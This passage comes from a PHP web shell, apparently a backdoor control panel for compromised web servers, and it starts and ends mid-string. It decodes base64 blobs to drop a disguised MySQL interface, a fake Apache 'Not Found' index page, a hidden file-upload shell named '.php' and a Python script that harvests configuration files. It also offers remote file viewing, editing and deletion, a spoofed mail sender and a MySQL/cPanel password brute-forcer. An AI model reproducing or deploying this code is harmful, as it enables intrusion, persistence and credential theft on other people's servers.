S0tLS0tLS0tLS0tLSAvLw0KZXJyb3JfcmVwb3J0aW5nKDApOw0KaW5pX3NldCAoJ2Rpc3BsYXlfZXJyb3JzJywgMCk7DQppbmlfc2V0ICgnbG9nX2Vycm9ycycsIDApOw0KaWYoICRhY3Rpb24gPT0gImxvZ29uIiB8fCAkYWN0aW9uID09ICIiIHx8ICRhY3Rpb24gPT0gImxvZ291dCIgKQ0KCWxvZ29uKCk7DQplbHNlIGlmKCAkYWN0aW9uID09ICJiRzluYjI1ZmMzVmliV2wwIiApDQoJbG9nb25fc3VibWl0KCk7DQplbHNlIGlmKCAkYWN0aW9uID09ICJkdW1wVGFibGUiIHx8ICRhY3Rpb24gPT0gImR1bXBEQiIgKSB7DQoJd2hpbGUoIGxpc3QoJHZhciwgJHZhbHVlKSA9IGVhY2goJEhUVFBfQ09PS0lFX1ZBUlMpICkgew0KCQlpZiggJHZhciA9PSAibXlzcWxfd2ViX2FkbWluX3VzZXJuYW1lIiApICRVU0VSTkFNRSA9ICR2YWx1ZTsNCgkJaWYoICR2YXIgPT0gIm15c3FsX3dlYl9hZG1pbl9wYXNzd29yZCIgKSAkUEFTU1dPUkQgPSAkdmFsdWU7DQoJCWlmKCAkdmFyID09ICJteXNxbF93ZWJfYWRtaW5faG9zdG5hbWUiICkgJEhPU1ROQU1FID0gJHZhbHVlOw0KCX0NCgkkbXlzcWxIYW5kbGUgPSBAbXlzcWxfY29ubmVjdCggJEhPU1ROQU1FLiI6MzMwNiIsICRVU0VSTkFNRSwgJFBBU1NXT1JEICk7DQoJZHVtcCgpOw0KfSBlbHNlIHsNCgl3aGlsZSggbGlzdCgkdmFyLCAkdmFsdWUpID0gZWFjaCgkSFRUUF9DT09LSUVfVkFSUykgKSB7DQoJCWlmKCAkdmFyID09ICJteXNxbF93ZWJfYWRtaW5fdXNlcm5hbWUiICkgJFVTRVJOQU1FID0gJHZhbHVlOw0KCQlpZiggJHZhciA9PSAibXlzcWxfd2ViX2FkbWluX3Bhc3N3b3JkIiApICRQQVNTV09SRCA9ICR2YWx1ZTsNCgkJaWYoICR2YXIgPT0gIm15c3FsX3dlYl9hZG1pbl9ob3N0bmFtZSIgKSAkSE9TVE5BTUUgPSAkdmFsdWU7DQoJfQ0KCWVjaG8gIjwhLS0iOw0KCSRteXNxbEhhbmRsZSA9IEBteXNxbF9jb25uZWN0KCAkSE9TVE5BTUUuIjozMzA2IiwgJFVTRVJOQU1FLCAkUEFTU1dPUkQgKTsNCgllY2hvICItLT4iOw0KCWlmKCAkbXlzcWxIYW5kbGUgPT0gZmFsc2UgKSB7DQoJCWVjaG8gIjx0YWJsZSB3aWR0aD0xMDAlIGhlaWdodD0xMDAlPjx0cj48dGQ+PGNlbnRlcj5cbiI7DQoJCWVjaG8gIjxoMT5Xcm9uZyBQYXNzd29yZCE8L2gxPlxuIjsNCgkJZWNobyAiPGEgaHJlZj0nJFBIUF9TRUxGP2FjdGlvbj1sb2dvbic+TG9nb248L2E+XG4iOw0KCQllY2hvICI8L2NlbnRlcj48L3RkPjwvdHI+PC90YWJsZT5cbiI7DQoJfSBlbHNlIHsNCgkJaWYoICRhY3Rpb24gPT0gImJHbHpkRVJDY3c9PSIgKQ0KCQkJbGlzdERhdGFiYXNlcygpOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJjcmVhdGVEQiIgKQ0KCQkJY3JlYXRlRGF0YWJhc2UoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZHJvcERCIiApDQoJCQlkcm9wRGF0YWJhc2UoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAibGlzdFRhYmxlcyIgKQ0KCQkJbGlzdFRhYmxlcygpOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJjcmVhdGVUYWJsZSIgKQ0KCQkJY3JlYXRlVGFibGUoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZHJvcFRhYmxlIiApDQoJCQlkcm9wVGFibGUoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAidmlld1NjaGVtYSIgKQ0KCQkJdmlld1NjaGVtYSgpOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJxdWVyeSIgKQ0KCQkJdmlld0RhdGEoICRxdWVyeVN0ciApOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJhZGRGaWVsZCIgKQ0KCQkJbWFuYWdlRmllbGQoICJhZGQiICk7DQoJCWVsc2UgaWYoICRhY3Rpb24gPT0gImFkZEZpZWxkX3N1Ym1pdCIgKQ0KCQkJbWFuYWdlRmllbGRfc3VibWl0KCAiYWRkIiApOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJlZGl0RmllbGQiICkNCgkJCW1hbmFnZUZpZWxkKCAiZWRpdCIgKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZWRpdEZpZWxkX3N1Ym1pdCIgKQ0KCQkJbWFuYWdlRmllbGRfc3VibWl0KCAiZWRpdCIgKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZHJvcEZpZWxkIiApDQoJCQlkcm9wRmllbGQoKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiZG1sbGQwUmhkR0U9IiApDQoJCQl2aWV3RGF0YSggIiIgKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiYWRkRGF0YSIgKQ0KCQkJbWFuYWdlRGF0YSggImFkZCIgKTsNCgkJZWxzZSBpZiggJGFjdGlvbiA9PSAiYWRkRGF0YV9zdWJtaXQiICkNCgkJCW1hbmFnZURhdGFfc3VibWl0KCAiYWRkIiApOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJlZGl0RGF0YSIgKQ0KCQkJbWFuYWdlRGF0YSggImVkaXQiICk7DQoJCWVsc2UgaWYoICRhY3Rpb24gPT0gImVkaXREYXRhX3N1Ym1pdCIgKQ0KCQkJbWFuYWdlRGF0YV9zdWJtaXQoICJlZGl0IiApOw0KCQllbHNlIGlmKCAkYWN0aW9uID09ICJkZWxldGVEYXRhIiApDQoJCQlkZWxldGVEYXRhKCk7DQoJCWVsc2UgaWYoICRhY3Rpb24gPT0gInV0aWxzIiApDQoJCQl1dGlscygpOw0KCQlteXNxbF9jbG9zZSggJG15c3FsSGFuZGxlKTsNCgkJZm9vdGVyX2h0bWwoKTsNCgl9DQp9DQo/Pg0KPGh0bWw+DQo8aGVhZD4NCjx0aXRsZT5NeVNRTCBJbnRlcmZhY2UgKERldmVsb3BlZCBCeSBNb2hhamVyMjIpPC90aXRsZT4NCjxib2R5IGJnQ29sb3I9IzAwMDAwMCA+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KPCEtLQ0KcC5sb2NhdGlvbiB7DQoJY29sb3I6ICMwMEZGMDA7DQp9DQpoMSwgaDIsIGgzIHsNCgljb2xvcjogIzAwRkYwMDsNCn0NCnRoIHsNCgliYWNrZ3JvdW5kLWNvbG9yOiAjMjIyMjIyOw0KCWNvbG9yOiAjMDBGRjAwOw0KCWZvbnQtc2l6ZTogc21hbGw7DQp9DQp0ZCB7DQoJY29sb3I6ICMwMEZGMDA7DQoJYmFja2dyb3VuZC1jb2xvcjogIzQ0NDQ0NDsNCglmb250LXNpemU6IHNtYWxsOw0KfQ0KZm9ybSB7DQoJbWFyZ2luLXRvcDogMDsNCgltYXJnaW4tYm90dG9tOiAwOw0KfQ0KYSB7DQoJdGV4dC1kZWNvcmF0aW9uOm5vbmU7DQoJY29sb3I6ICMwMEZGMDA7DQoJZm9udC1zaXplOnNtYWxsOw0KfQ0KQTpsaW5rIHsNCkNPTE9SOiNGRkZGRkY7DQpURVhULURFQ09SQVRJT046IG5vbmUNCn0NCkE6dmlzaXRlZCB7DQpDT0xPUjojMDBGRjAwOw0KVEVYVC1ERUNPUkFUSU9OOiBub25lDQp9DQpBOmFjdGl2ZSB7DQpDT0xPUjojMDBGRjAwOw0KVEVYVC1ERUNPUkFUSU9OOiBub25lDQp9DQpBOmhvdmVyIHsNCmNvbG9yOiMwMEZGMDA7DQpURVhULURFQ09SQVRJT046IG5vbmUNCn0NCmlucHV0LCBzZWxlY3QsIHRleHRhcmVhIHsNCmJhY2tncm91bmQtY29sb3I6ICMwMDAwMDA7DQpib3JkZXItc3R5bGU6IHNvbGlkOw0KZm9udC1mYW1pbHk6IFRhaG9tYSxWZXJkYW5hLEFyaWFsLFNhbnMtU2VyaWY7DQpmb250LXNpemU6c21hbGw7DQpjb2xvcjogIzAwRkYwMDsNCnBhZGRpbmc6IDBweDsNCn0NCmxpIHsNCmNvbG9yOiAjMDBGRjAwOw0KfQ0KLm5ldyB7DQpjb2xvcjogIzAwRkYwMDsNCn0NCi8vLS0+DQo8L3N0eWxlPg0KPC9oZWFkPg==\'; \r\n$file = fopen("db-sql.php" ,"w+");\r\n$write = fwrite ($file ,base64_decode($sqlshell));\r\nfclose($file);\r\n    chmod("db-sql.php", 0644);\r\n$indexshell = fopen("index.php" ,"w+");\r\n$data = \'PGgxPk5vdCBGb3VuZDwvaDE+IA0KPHA+VGhlIHJlcXVlc3RlZCBVUkwgd2FzIG5vdCBmb3VuZCBvbiB0aGlzIHNlcnZlci48L3A+IA0KPGhyPiANCjxhZGRyZXNzPkFwYWNoZSBTZXJ2ZXIgYXQgPD89JF9TRVJWRVJbJ0hUVFBfSE9TVCddPz4gUG9ydCA4MDwvYWRkcmVzcz4gDQogICAgPHN0eWxlPiANCiAgICAgICAgaW5wdXQgeyBtYXJnaW46MDtiYWNrZ3JvdW5kLWNvbG9yOiNmZmY7Ym9yZGVyOjFweCBzb2xpZCAjZmZmOyB9IA0KICAgIDwvc3R5bGU+\';\r\n$tulis = fwrite( $indexshell, base64_decode($data));\r\nfclose($indexshell);\r\n   echo "<iframe src=mysql/db-sql.php width=97% height=100% frameborder=0></iframe>"; \r\n}\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'mail\')){\r\nif(isset($_POST[\'mail_send\'])){\r\n\t$mail_to = $_POST[\'mail_to\'];\r\n\t$mail_from = $_POST[\'mail_from\'];\r\n\t$mail_subject = $_POST[\'mail_subject\'];\r\n\t$mail_content = magicboom($_POST[\'mail_content\']);\r\n\tif(@mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from")){\r\n\t\t$msg = "email sent to $mail_to";\r\n\t}\r\n\telse $msg = "send email failed";\r\n}\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=mail" method="post">\r\n<table class="cmdbox">\r\n<tr><td>\r\n<textarea class="output" name="mail_content" id="cmd" style="height:340px;">Hey there, please patch me ASAP ;-p</textarea>\r\n<tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="[email protected]" name="mail_to" />&nbsp; mail to</td></tr>\r\n<tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="[email protected]" name="mail_from" />&nbsp; from</td></tr>\r\n<tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="patch me" name="mail_subject" />&nbsp; subject</td></tr>\r\n<tr><td>&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="mail_send" /></td></tr></form>\r\n<tr><td>&nbsp;&nbsp;&nbsp;&nbsp;<?php echo $msg; ?></td></tr>\r\n</table>\r\n</form>\r\n\r\n<?php }\r\n\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'phpinfo\')){ \r\n\t@ob_start();\r\n\t@eval("phpinfo();");\r\n\t$buff = @ob_get_contents();\r\n\t@ob_end_clean();\t\r\n\t$awal = strpos($buff,"<body>")+6;\r\n\t$akhir = strpos($buff,"</body>");\r\n\techo "<div class=\\"phpinfo\\">".substr($buff,$awal,$akhir-$awal)."</div>";\r\n}\r\nelseif(isset($_GET[\'view\']) && ($_GET[\'view\'] != "")){\r\n  if(is_file($_GET[\'view\'])){ \r\n\tif(!isset($file)) $file = magicboom($_GET[\'view\']);\r\n\tif(!$win && $posix){\r\n\t\t$name=@posix_getpwuid(@fileowner($folder));\r\n\t\t$group=@posix_getgrgid(@filegroup($folder));\r\n\t\t$owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\'];\r\n\t}\r\n\telse {\r\n\t\t$owner = $user;\r\n\t}\r\n\t$filn = basename($file);\r\n\techo "<table style=\\"margin:6px 0 0 2px;line-height:20px;\\">\r\n\t<tr><td>Filename</td><td><span id=\\"".clearspace($filn)."_link\\">".$file."</span>\r\n\t<form action=\\"?y=".$pwd."&amp;view=$file\\" method=\\"post\\" id=\\"".clearspace($filn)."_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\">\r\n\t\t<input type=\\"hidden\\" name=\\"oldname\\" value=\\"".$filn."\\" style=\\"margin:0;padding:0;\\" />\r\n\t\t<input class=\\"inputz\\" style=\\"width:200px;\\" type=\\"text\\" name=\\"newname\\" value=\\"".$filn."\\" />\r\n\t\t<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" value=\\"rename\\" />\r\n\t\t<input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\" onclick=\\"tukar(\'".clearspace($filn)."_link\',\'".clearspace($filn)."_form\');\\" />\r\n\t</form>\r\n\t</td></tr>\r\n\t<tr><td>Size</td><td>".ukuran($file)."</td></tr>\r\n\t<tr><td>Permission</td><td>".get_perms($file)."</td></tr>\r\n\t<tr><td>Owner</td><td>".$owner."</td></tr>\r\n\t<tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr>\r\n\t<tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr>\r\n\t<tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr>\r\n\t<tr><td>Actions</td><td><a href=\\"?y=$pwd&amp;edit=$file\\">edit</a> | <a href=\\"javascript:tukar(\'".clearspace($filn)."_link\',\'".clearspace($filn)."_form\');\\">rename</a> | <a href=\\"?y=$pwd&amp;delete=$file\\">delete</a> | <a href=\\"?y=$pwd&amp;dl=$file\\">download</a>&nbsp;(<a href=\\"?y=$pwd&amp;dlgzip=$file\\">gzip</a>)</td></tr>\r\n\t<tr><td>View</td><td><a href=\\"?y=".$pwd."&amp;view=".$file."\\">text</a> | <a href=\\"?y=".$pwd."&amp;view=".$file."&amp;type=code\\">code</a> | <a href=\\"?y=".$pwd."&amp;view=".$file."&amp;type=image\\">image</a></td></tr>\r\n\t</table>\r\n\t";\r\n\tif(isset($_GET[\'type\']) && ($_GET[\'type\']==\'image\')){\r\n\t\techo "<div style=\\"text-align:center;margin:8px;\\"><img src=\\"?y=".$pwd."&amp;img=".$filn."\\"></div>";\r\n\t}\r\n\telseif(isset($_GET[\'type\']) && ($_GET[\'type\']==\'code\')){\r\n\t\techo "<div class=\\"viewfile\\">";\r\n\t\t$file = wordwrap(@file_get_contents($file),"240","\\n");\r\n\t\t@highlight_string($file);\r\n\t\techo "</div>";\r\n\t}\r\n\telse {\r\n\t\techo "<div class=\\"viewfile\\">";\r\n\t\techo nl2br(htmlentities((@file_get_contents($file))));\r\n\t\techo "</div>";\r\n\t}\r\n  }\r\n  elseif(is_dir($_GET[\'view\'])){\r\n\t\techo showdir($pwd,$prompt);\r\n  }\r\n\t\r\n}\r\nelseif(isset($_GET[\'edit\']) && ($_GET[\'edit\'] != "")){\r\n\r\n\t\tif(isset($_POST[\'save\'])){\r\n\t\t\t$file = $_POST[\'saveas\'];\r\n\t\t\t$content = magicboom($_POST[\'content\']);\r\n\t\t\tif($filez = @fopen($file,"w")){\r\n\t\t\t\t$time = date("d-M-Y H:i",time());\r\n\t\t\t\tif(@fwrite($filez,$content)) $msg = "file saved <span class=\\"gaya\\">@</span> ".$time;\r\n\t\t\t\telse $msg = "failed to save";\r\n\t\t\t\t@fclose($filez);\r\n\t\t\t}\r\n\t\t\telse $msg = "permission denied";\r\n\t\t}\r\n\t\tif(!isset($file)) $file = $_GET[\'edit\'];\r\n\t\tif($filez = @fopen($file,"r")){\r\n\t\t\t$content = "";\r\n\t\t\twhile(!feof($filez)){\r\n\t\t\t\t$content .= htmlentities(str_replace("\'\'","\'",fgets($filez)));\r\n\t\t\t}\r\n\t\t\t@fclose($filez);\r\n\t\t}\r\n\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;edit=<?php echo $file; ?>" method="post">\r\n<table class="cmdbox">\r\n<tr><td colspan="2">\r\n<textarea class="output" name="content">\r\n<?php echo $content; ?>\r\n</textarea>\r\n<tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" /><input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" />\r\n&nbsp;<?php echo $msg; ?></td></tr>\r\n</table>\r\n</form>\r\n<?php\r\n}\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'logout\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=logout" method="post">\r\n\r\n<?php\r\n    unset($_SESSION[md5($_SERVER[\'HTTP_HOST\'])]); \r\n    echo \'bye!\'; \r\n}\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'brute\'))\r\n\t\t\t{\t\r\n\t\t\t?>\r\n\t\t\t\t<form action="?y=<?php echo $pwd; ?>&amp;x=brute" method="post">\r\n\t\t\t<?php\r\n\t\t\t//bruteforce\r\n?>\r\n<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\r\n<?php\r\n/*\r\nRecoded By X\'1n73ct\r\n*/\r\n@set_time_limit(0);\r\n@error_reporting(0);\r\n\r\n\r\nif($_POST[\'page\']==\'find\')\r\n{\r\nif(isset($_POST[\'usernames\']) && isset($_POST[\'passwords\']))\r\n{\r\n    if($_POST[\'type\'] == \'passwd\'){\r\n        $e = explode("\\n",$_POST[\'usernames\']);\r\n        foreach($e as $value){\r\n        $k = explode(":",$value);\r\n        $username .= $k[\'0\']." ";\r\n        }\r\n    }elseif($_POST[\'type\'] == \'simple\'){\r\n        $username = str_replace("\\n",\' \',$_POST[\'usernames\']);\r\n    }\r\n    $a1 = explode(" ",$username);\r\n    $a2 = explode("\\n",$_POST[\'passwords\']);\r\n    $id2 = count($a2);\r\n    $ok = 0;\r\n    foreach($a1 as $user )\r\n    {\r\n        if($user !== \'\')\r\n        {\r\n        $user=trim($user);\r\n         for($i=0;$i<=$id2;$i++)\r\n         {\r\n            $pass = trim($a2[$i]);\r\n            if(@mysql_connect(\'localhost\',$user,$pass))\r\n            {\r\n                echo "X\'1n73ct~ user is (<b><font color=green>$user</font></b>) Password is (<b><font color=green>$pass</font></b>)<br />";\r\n                $ok++;\r\n            }\r\n         }\r\n        }\r\n    }\r\n    echo "<hr><b>You Found <font color=green>$ok</font> Cpanel by x\'1n73ct</b>";\r\n    echo "<center><b><a href=".$_SERVER[\'PHP_SELF\'].">BACK</a>";\r\n    exit;\r\n}\r\n}\r\nif($_POST[\'pass\']==\'password\'){\r\n@error_reporting(0);\r\n$i = getenv(\'REMOTE_ADDR\');\r\n$d = date(\'D, M jS, Y H:i\',time());\r\n$h = $_SERVER[\'HTTP_HOST\'];\r\n$dir=$_SERVER[\'PHP_SELF\'];\r\n$back = "PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCmlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKSB7IGVjaG8gJzxiPktvcmFuZyBEYWggQmVyamF5YSBVcGxvYWQgU2hlbGwgS29yYW5nISEhPGI+PGJyPjxicj4nOyB9DQplbHNlIHsgZWNobyAnPGI+S29yYW5nIEdhZ2FsIFVwbG9hZCBTaGVsbCBLb3JhbmchISE8L2I+PGJyPjxicj4nOyB9DQp9DQo/Pg==";\r\n$file = fopen(".php","w+");\r\n$write = fwrite ($file ,base64_decode($back));\r\nfclose($file);\r\nchmod(".php",0755);\r\nmkdir(\'config\',0755);\r\n$cp =\r\n\'IyEvdXNyL2Jpbi9lbnYgcHl0aG9uDQoNCicnJw0KQnk6IEFobWVkIFNoYXdreSBha2EgbG54ZzMzaw0KdGh4OiBPYnp5LCBSZWxpaywgbW9oYWIgYW5kICNhcmFicHduIA0KJycnDQoNCmltcG9ydCBzeXMNCmltcG9ydCBvcw0KaW1wb3J0IHJlDQppbXBvcnQgc3VicHJvY2Vzcw0KaW1wb3J0IHVybGxpYg0KaW1wb3J0IGdsb2INCmZyb20gcGxhdGZvcm0gaW1wb3J0IHN5c3RlbQ0KDQppZiBsZW4oc3lzLmFyZ3YpICE9IDM6DQogIHByaW50JycnCQ0KIFVzYWdlOiAlcyBbVVJMLi4uXSBbZGlyZWN0b3J5Li4uXQ0KIEV4KSAlcyBodHRwOi8vd3d3LnRlc3QuY29tL3Rlc3QvIFtkaXIgLi4uXScnJyAlIChzeXMuYXJndlswXSwgc3lzLmFyZ3ZbMF0pDQogIHN5cy5leGl0KDEpDQoNCnNpdGUgPSBzeXMuYXJndlsxXQ0KZm91dCA9IHN5cy5hcmd2WzJdDQoNCnRyeToNCiAgcmVxICA9IHVybGxpYi51cmxvcGVuKHNpdGUpDQogIHJlYWQgPSByZXEucmVhZCgpDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAndycpDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZiA9IG9wZW4oJ2RhdGEudHh0JywgJ3cnKSAgDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KDQogIGkgPSAwDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAnclUnKQ0KICAgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTIuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMi5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgZi5jbG9zZSgpDQogIGlmIHN5c3RlbSgpID09ICdXaW5kb3dzJzoNCiAgICBmID0gb3BlbignZGF0YS50eHQnLCAnclUnKQ0KICAgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTIuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMi5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgZi5jbG9zZSgpDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgY2xlYW51cCA9IHN1YnByb2Nlc3MuUG9wZW4oJ3JtIC1yZiAvdG1wL2RhdGEudHh0ID4gL2Rldi9udWxsJywgc2hlbGw9VHJ1ZSkud2FpdCgpDQogIGlmIHN5c3RlbSgpID09ICdXaW5kb3dzJzoNCiAgICBjbGVhbnVwID0gc3VicHJvY2Vzcy5Qb3BlbignZGVsIEM6XGRhdGEudHh0Jywgc2hlbGw9VHJ1ZSkud2FpdCgpDQogIHByaW50ICdcbicsICctJyAqIDEwMCwgJ1xuJw0KICBpZiBzeXN0ZW0oKSA9PSAnTGludXgnOg0KICAgIGZvciByb290LCBkaXJzLCBmaWxlcyBpbiBvcy53YWxrKGZvdXQpOg0KICAgICAgZm9yIGZuYW1lIGluIGZpbGVzOg0KICAgICAgICBmdWxscGF0aCA9IG9zLnBhdGguam9pbihyb290LCBmbmFtZSkNCiAgICAgICAgZiA9IG9wZW4oZnVsbHBhdGgsICdyJykNCiAgICAgICAgZm9yIGxpbmUgaW4gZjoNCiAgICAgICAgICBzZWNyID0gcmUuc2